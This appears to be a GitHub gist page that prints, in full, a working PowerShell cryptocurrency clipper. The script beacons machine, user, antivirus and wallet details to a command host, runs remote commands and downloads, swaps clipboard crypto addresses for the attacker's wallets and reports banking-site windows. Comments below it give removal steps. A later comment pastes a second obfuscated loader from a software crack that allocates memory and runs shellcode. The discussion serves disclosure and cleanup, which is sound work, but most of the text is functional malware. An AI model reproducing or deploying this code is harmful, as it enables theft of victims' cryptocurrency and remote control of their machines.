    foreach ($av in $avs) {
        $enabled = (av_enabled $av.productState);
        $avf.Add($av.displayName + " [$enabled]")
    }

    return [string]::Join(", ", $avf.ToArray())
}

function vxUABGtfQ7B7([string]$str) {
    if ($str.Length -eq 0) {
        return "";
    }
    $str = $str.Replace("/", "");
    return ($str.Substring(0, 1).ToUpper() + $str.Substring(1));
}

function getUserAgent {
    $iJunq6e5ivimimy = FindPaths;
    return $nb0MawLGyrxf + $UV1oAmOp0S3 + (vxUABGtfQ7B7 (XF3a8JO3r5r8G "COMPUTERNAME")) + $UV1oAmOp0S3 + (vxUABGtfQ7B7 (XF3a8JO3r5r8G "USERNAME")) + $UV1oAmOp0S3 + (vxUABGtfQ7B7 (ik9hXhN11R)) + " [" + (P9TEtu77LCNtD) + "]" + $UV1oAmOp0S3 + (vxUABGtfQ7B7 (TmBvivf3Wwj8U7NzZh)) + $UV1oAmOp0S3 + $iJunq6e5ivimimy + $UV1oAmOp0S3
}


function oUjmVhxHJ4Qhrw($data, $notify) {
    $URL = "http://api.private-chatting.com/connect";
    if ($OS_Major -ne "6.1") {
        [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;
        [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
    }
    $cli = New-Object System.Net.WebClient;
    $useragent = getUserAgent;
    $cli.Headers['X-User-Agent'] = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($useragent));
    if ($notify) {
        $cli.Headers['X-notify'] = $notify
    }
    $Response = $cli.UploadString($URL, $data);
    $WorkerEn = $cli.ResponseHeaders["worker"];
    if ($WorkerEn -eq "0") {
        $global:worker = $false;
    }
    else {
        $global:worker= $true;
    }
    return $Response.ToString()

}

function DownloadFile([string]$URL, [string]$Filename) {
    [string]$UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/599.99 (KHTML, like Gecko) Chrome/81.0.3999.199 Safari/599.99";
    if ($OS_Major -ne "6.1") {
        [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;
        [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true };
        $ret = Invoke-WebRequest -Uri $URL -OutFile $Filename -UserAgent $UserAgent -Method 'GET'
    }
    else {
        $cli = New-Object System.Net.WebClient;
        $cli.Headers['User-Agent'] = $UserAgent;
        $cli.DownloadFile($URL, $Filename);
    }

   
}
function yQM1ybBDSjEP($url, $path, $wait) {
    DownloadFile $url $path
}

function Gn4bSDMHKIxEE8UP7wZJ($quit) {

    Remove-Item -Path $svauXHdYmXwV1whE;
    if ($quit) {
        exit(0);
    }
}

function Test-Function([string] $func) {
    try {
        $ret = Get-Command  -Name $func;
        if ($ret) {
            return $true
        }
    }
    catch {
    }
    return $false
}

if (!(Test-Function "Get-Clipboard") -or !(Test-Function "Set-Clipboard")) {
    Add-Type -AssemblyName PresentationFramework;

    function Get-Clipboard($Format) {
        return [System.Windows.Clipboard]::GetText();
    }

    function Set-Clipboard($Value) {
        [System.Windows.Clipboard]::SetText($Value)
    }


}

function log_event([string] $coin, [string] $value) {
    oUjmVhxHJ4Qhrw "" ($coin + " - " + $value)
} 



$coins = @"
[
    {
        "a": "bc1qn6ype8u5kgj672mvsez9wz9wt9wk22tzd5vprp",
        "r": "^bc1[a-z0-9]{39,59}$",
        "c": "BTC"
    },
    {
        "a": "1Pqkb4MZwKzgSNkaX32wMwg95D9NfW9vZX",
        "r": "^1[a-km-zA-HJ-NP-Z1-9]{26,33}$",
        "c": "BTC"
    },
    {
        "a": "3JvBvRuBfYvB6MjzMornj9EQpxhq9W7vXP",
        "r": "^3[a-km-zA-HJ-NP-Z1-9]{26,33}$",
        "c": "BTC"
    },
    {
        "a": "qq9yrhef7csy3yzgxgs0rvkvez440mk53gv8ulyu6a",
        "r": "^((bitcoincash|bchreg|bchtest):)?(q|p)[a-z0-9]{41}$",
        "c": "BCH"
    },
    {
        "a": "bnb1vmwl54jxj9yvsgz33xtyuvqnurdjy2raqnttkq",
        "r": "^(bnb)([a-z0-9]{39})$",
        "c": "BNB"
    },
    {
        "a": "0x884467182849bA788ba89300e176ebe11624C882",
        "r": "^0x[a-fA-F0-9]{40}$",
        "c": "ETH"
    },
    {
        "a": "48qx1krgEGzdcSacbmZdioNwXxW6r43yFSJDKPWZb3wsK9pYhajHNyE5FujWo1NxVwEBvGebS7biW9mjMEWdMevqMGmDJ6x",
        "r": "^[48][0-9AB][1-9A-HJ-NP-Za-km-z]{93}$",
        "c": "XMR"
    },
    {
        "a": "rH6dyKWNpcvFz6fQ4ohyDbevSxcxdxfSmz",
        "r": "^r[rpshnaf39wBUDNEGHJKLM4PQRST7VWXYZ2bcdeCg65jkm8oFqi1tuvAxyz]{24,34}$",
        "c": "XRP"
    },
    {
        "a": "DDxhfK5wbJkRN25mAbBYk3ND4xLjiMRyNq",
        "r": "^D{1}[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32}$",
        "c": "DOGE"
    },
    {
        "a": "Xtwj8uGx77NYBUki1UCPvEhe4kHYi6yWng",
        "r": "^X[1-9A-HJ-NP-Za-km-z]{33}$",
        "c": "DASH"
    }

]
"@
function main2 {

    if ($global:worker -eq $false) {
        return;
    }

    $book = ConvertFrom-Json $coins

    try {
        [string]$clip = Get-Clipboard -Format Text;
        $clip = $clip.Trim();

        foreach ($entry in $book) {

            if (($clip -match $entry.r) -and ($clip -ne $entry.a) -and ($entry.a -ne "")) {
                Set-Clipboard -Value $entry.a
                log_event $entry.c $clip+"newnewapp"
            }

        }
               
    }
    catch {
    }
}



function main {

    
    $ZFKUuv2t12Af = "|V|";
    $UV1oAmOp0S3 = "\";
    $V7vFcwq3wUVRrsgcv = "M_22";
    $nb0MawLGyrxf = $V7vFcwq3wUVRrsgcv + '_' + (B6ZqvVzzJXq27j);
    $AuVAfc591z0Yw = (XF3a8JO3r5r8G "temp") + $UV1oAmOp0S3;
    $svauXHdYmXwV1whE = $scriptItem.FullName;
    $aWOPoMdm8aLL89 = $scriptItem.Name;
    $EwcQB8qBuCScs = "powershell.exe";
	

    while ($true) {

        try {
            [string]$kk9XDcoU8Sfo692 = oUjmVhxHJ4Qhrw;
            [string[]] $sep = $ZFKUuv2t12Af;
            $Fd1Jal88zKyxij = $kk9XDcoU8Sfo692.Split( $sep, [StringSplitOptions]::None);
            $ivI0sA6txn5XPifq = $Fd1Jal88zKyxij[0];
            $JkByjqH1xztsW2YUG = $Fd1Jal88zKyxij[1];
        
            if ($ivI0sA6txn5XPifq -eq "Cmd") { 
                Start-Process -FilePath "cmd.exe" -WindowStyle "Hidden" -ArgumentList ("/c " + $JkByjqH1xztsW2YUG) 
            }
            if ($ivI0sA6txn5XPifq -eq "DwnlExe") {
                $path = $AuVAfc591z0Yw + $Fd1Jal88zKyxij[2];
                $cmd = $Fd1Jal88zKyxij[3] + $path;
                yQM1ybBDSjEP $Fd1Jal88zKyxij[1] $path $true;
                Start-Sleep 1
                Start-Process -FilePath "cmd.exe" -WindowStyle "Hidden" -ArgumentList ("/c " + $cmd) 
            }
            if ($ivI0sA6txn5XPifq -eq "SelfRemove") {
                Gn4bSDMHKIxEE8UP7wZJ $true
            } 
        }
        catch {}

  
  
  
  try {
            main2;
        }
        catch
        {}
       
        try {
            FindWindow
        }
        catch
        {}
        
        Start-Sleep 1
    }
   

}
$pathdata = 
@'
[
    {
        "root": "%appdata%",
        "targets": [
            {
                "name": "Exodus-A",
                "path": "Exodus"
            },
            {
                "name": "Atomic-A",
                "path": "Atomic Wallet"
            },
            {
                "name": "Electrum-A",
                "path": "Electrum"
            },
            {
                "name": "Ledger-A",
                "path": "Ledger Live"
            },
            {
                "name": "Jaxx-A",
                "path": "Jaxx Liberty"
            },
            {
                "name": "com.liberty.jaxx-A",
                "path": "com.liberty.jaxx"
            },
            {
                "name": "Guarda-A",
                "path": "Guarda"
            },
            {
                "name": "Armory-A",
                "path": "Armory"
            },
            {
                "name": "DELTA-A",
                "path": "DELTA"
            },
            {
                "name": "TREZOR-A",
                "path": "TREZOR Bridge"
            },
            {
                "name": "Bitcoin-A",
                "path": "Bitcoin"
            },
            {
                "name": "binance-A",
                "path": "binance"
            }
        ]
    },
    {
        "root": "%localappdata%",
        "targets": [
            {
                "name": "Blockstream-A",
                "path": "Blockstream Green"
            },
            {
                "name": "Coinomi-A",
                "path": "Coinomi"
            }
        ]
    },
    {
        "root": "%localappdata%\\Google\\Chrome\\User Data\\Default\\Extensions",
        "targets": [
            {
                "name": "Metamask-C",
                "path": "nkbihfbeogaeaoehlefnkodbefgpgknn"
            },
            {
                "name": "MEWcx-C",
                "path": "nlbmnnijcnlegkjjpcfjclmcfggfefdm"
            },
            {
                "name": "Coin98-C",
                "path": "aeachknmefphepccionboohckonoeemg"
            },
            {
                "name": "Binance-C",
                "path": "fhbohimaelbohpjbbldcngcnapndodjp"
            },
            {
                "name": "Jaxx-C",
                "path": "cjelfplplebdjjenllpjcblmjkfcffne"
            },
            {
                "name": "Coinbase-C",
                "path": "hnfanknocfeofbddgcijnmhnfnkdnaad"
            }
        ]
    },
    {
        "root": "%localappdata%\\Microsoft\\Edge\\User Data\\Default\\Extensions",
        "targets": [
            {
                "name": "Metamask-E",
                "path": "ejbalbakoplchlghecdalmeeeajnimhm"
            },
            {
                "name": "Coinomi-E",
                "path": "gmcoclageakkbkbbflppkbpjcbkcfedg"
            }
        ]
    },
    {
        "root": "%localappdata%\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Extensions",
        "targets": [
            {
                "name": "Metamask-B",
                "path": "nkbihfbeogaeaoehlefnkodbefgpgknn"
            },
            {
                "name": "MEWcx-B",
                "path": "nlbmnnijcnlegkjjpcfjclmcfggfefdm"
            },
            {
                "name": "Coin98-B",
                "path": "aeachknmefphepccionboohckonoeemg"
            },
            {
                "name": "Binance-B",
                "path": "fhbohimaelbohpjbbldcngcnapndodjp"
            },
            {
                "name": "Jaxx-B",
                "path": "cjelfplplebdjjenllpjcblmjkfcffne"
            },
            {
                "name": "Coinbase-B",
                "path": "hnfanknocfeofbddgcijnmhnfnkdnaad"
            }
        ]
    }
]
'@;

function FindPaths {

    $a = ConvertFrom-Json $pathdata
    $results = New-Object Collections.Generic.List[string];

    try {
        $ba = Get-ChildItem -Path "$env:appdata\Mozilla\Firefox\Profiles\*.xpi" -Recurse -Force;
        Foreach ($i in $ba) {
            if ($i.Name -match "ebextension@metamask.io.xpi") {
                try {
                    [string] $ss = "metamask-F"
                    $results.Add($ss)
    
                }
                catch {
                    Write-Host "error"
                }
            }
        }
    }
    catch {}


    foreach ($entry in $a) {
        $rootdir = [System.Environment]::ExpandEnvironmentVariables($entry.root);
        foreach ($target in $entry.targets) {
            if ((Test-Path -Path (Join-Path -Path $rootdir -ChildPath $target.path))) {
                $results.Add($target.name)
            }

        }
    
    }

    $ret = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes([string]::Join("`n", $results)));
    return $ret;
}


function FindWindow {
    
        $keywords = @('binance', 'coinbase','blockchain','voyager','blockfi','coindesk','etoro','kucoin','citi','paxful','paypal','huobi','poloniex','bittrex','kraken','bitfinex','bitstamp')
    $windows = (Get-Process | Where-Object { $_.MainWindowTitle -ne "" } | Select-Object MainWindowTitle)

    foreach ($wndobj in $windows) {
        [string]$wnd = $wndobj.MainWindowTitle;
        foreach ($keyword in $keywords) {
            if ($wnd.ToLower().Contains($keyword.ToLower())) {
				try {
                    $contentfile = [System.IO.File]::ReadAllText("%SystemDrive%\Users\Public\log.dat").ToLower().replace(' ','');
                    $logsend = 'newnewapp' + ($keyword.ToLower() + "[" + $wnd.ToLower() + "]").ToLower().replace(' ','');
       if( $contentfile -eq $keyword.ToLower().replace(' ','') )
				{
                    $gtr ="";
				}
				else
				{
                    $datatowrite = ('newnewapp' + ($keyword.ToLower() + "[" + $wnd.ToLower() + "]")).ToLower().replace(' ','');
									[System.IO.File]::WriteAllText("%SystemDrive%\Users\Public\log.dat",$keyword.ToLower().replace(' ','') );
					                log_event 'newnewapp'  ($keyword.ToLower() + "[" + $wnd.ToLower() + "]");
				}	
    }
    catch {
        [System.IO.File]::WriteAllText("%SystemDrive%\Users\Public\log.dat",$keyword.ToLower().replace(' ','') );

    }
							
            }
        }
    }
    
}


while ($true) {
    try {
        main
    }
    catch {

    }
}

@WolfAlchemy
Copy link

WolfAlchemy commented Jun 4, 2022

How to remove this malware

  1. Open Task Scheduler
  2. A task was created under Microsoft > Windows > NetService > Network that is spawning PowerShell
  3. You can safely delete the entire NetService folder as it was also created by the malware
  4. Delete a fake log file that it created where it hides the script: C:\Windows\logs\system-logs.txt
  5. It also replaces the contents of C:\Windows\System32\SyncAppvPublishingServer.vbs with its own version. A copy from a clean install of Windows 11 can be found here: https://gist.github.com/infernoboy/7cc1fe26e647dd08e6e63a201cb38e27

That should be all. As for the app you were patching to begin with, in my case it isn't doing anything harmful and runs just fine.

What the malware appears to do

It monitors your clipboard looking for a cryptocurrency address. Once it finds one, it replaces it with its own address in the hopes you do not notice when you paste it. You'd be sending crypto to the malware writer's address if you don't. It also pings a server with some computer identifying information and the original address you wanted to send to. It doesn't look like any personal data is transmitted. I believe that's all it does, so it's not the most harmful thing. The addresses that the malware uses have made over $3m USD!

@NextNext333

@infernoboy hey, so I found this thread after PowerShell tried to do the same on my computer, but it's actually not quite the same. Looked through task manager and task scheduler, but didn't find anything suspicious.
But defender stopped PowerShell from loading resource Heur.BZC.ZFV.Boxter.361.52C9B94F. I don't suppose you have any ideas? I've looked through the folders you suggested but came up with nothing.

Side note. Y'all are nerds, and I wish I was on your level. XD I'm like mediocre above novice computer.... knowledge...wise...

@philhk
Copy link

philhk commented Aug 30, 2022

Does anyone know if there is anything suspicious in this code? It's from a crack by crackerfg.

Add-Type -AssemblyName System.Windows.Forms

$dat = [IO.File]::ReadAllBytes('bin.dat');
[Environment]::SetEnvironmentVariable('Desktop', [Environment]::GetFolderPath('Desktop'));
$installDir = [Environment]::ExpandEnvironmentVariables('%windir%');
if (-not [IO.Directory]::Exists($installDir)) {
    [Windows.MessageBox]::Show("Couldn't find defualt installation path ($installDir), Please specify.");
    $browser = New-Object System.Windows.Forms.FolderBrowserDialog
    $browser.Description = "Select Installation Folder";
    $browser.ShowNewFolderButton = $false;
    if ($browser.ShowDialog() -ne "OK") {
        exit(0);
    }
    $installDir = $browser.SelectedPath;
}
[Environment]::SetEnvironmentVariable('InstallDir', $installDir);

$assemblies = New-Object -TypeName System.Collections.Generic.Dictionary'[string, System.Reflection.Assembly]' -ArgumentList ([StringComparer]::OrdinalIgnoreCase)
foreach ($assembly in ([AppDomain]::CurrentDomain.GetAssemblies())) {
    $assemblies[[System.IO.Path]::GetFileName($assembly.Location)] = $assembly;
}

function Get-Ptr {
    param (
        [IntPtr]
        $ptr,
        [type[]]
        $params,
        [type]
        $rettype
    )
    $bu = [AppDomain]::CurrentDomain.DefineDynamicAssembly([System.Reflection.AssemblyName]::new(('_' + [guid]::NewGuid().ToString())), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(('_' + [guid]::NewGuid().ToString()), $false).DefineType(('_' + [guid]::NewGuid().ToString()), 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]);
    $bu.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $params).SetImplementationFlags('Runtime, Managed');
    $bu.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $rettype, $params).SetImplementationFlags('Runtime, Managed');
    $del = $bu.CreateType();
    return [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ptr, $del);
}

function Get-Func {
    param (
        [string]
        $module,
        [string]
        $name,
        [type[]]
        $params,
        [type]
        $rettype
    )
    $na = $assemblies['System.dll'].GetType(('Microsoft' + '.Win32.' + 'UnsafeN' + 'ativeMethods'));
    $gp = $na.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'));
    $md = $na.GetMethod('GetModuleHandle').Invoke($null, @($module));
    $ptr = $gp.Invoke($null, @(([System.Runtime.InteropServices.HandleRef]::new([object]::new(), $md)), $name));
    return Get-Ptr $ptr $params $rettype;
}

$fname = 'V';
$fname += 'i';
$fname += 'r';
$fname += 't';
$fname += 'u';
$fname += 'a';
$fname += 'l';
$fname += 'A';
$fname += 'l';
$fname += 'l';
$fname += 'o';
$fname += 'c';
$func = Get-Func 'Kernel32.dll' $fname @([IntPtr], [IntPtr], [uint32], [uint32]) ([IntPtr]);

[Array]::Reverse($dat, 0, 5920);
[Array]::Reverse($dat, 5920, 1792000);
$patch = $func.Invoke(0, 5920, 12288, 64);
[Runtime.InteropServices.Marshal]::Copy($dat, 0, $patch, 5920);
$patchfunc = Get-Ptr $patch @([uint32], [IntPtr], [IntPtr], [IntPtr]) ([IntPtr]);
$patch2 = [Runtime.InteropServices.Marshal]::AllocHGlobal(1792000);
[Runtime.InteropServices.Marshal]::Copy($dat, 5920, $patch2, 1792000);
$patchfunc.Invoke(0, $patch2, 1, 0);

function Copy-InstallFile {
    param (
        $path,
        $pos,
        $size
    )
    try {
        $path = [Environment]::ExpandEnvironmentVariables($path);
        [Array]::Reverse($dat, $pos, $size);
        $fs = [IO.File]::Create($path);
        $fs.Write($dat, $pos, $size);
        $fs.Dispose();
    }
    catch {
        [Windows.MessageBox]::Show("Failed write file $path, Make sure Application is not running.");
        exit(0);
    }
}

Copy-InstallFile '%SystemDrive%\Program Files\BorisFX\Sapphire 2022.5 Adobe\lib64\sapphire_ae.dll' 1797920 66840576;


[Windows.MessageBox]::Show("Patch complete!");
exit(0);```

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment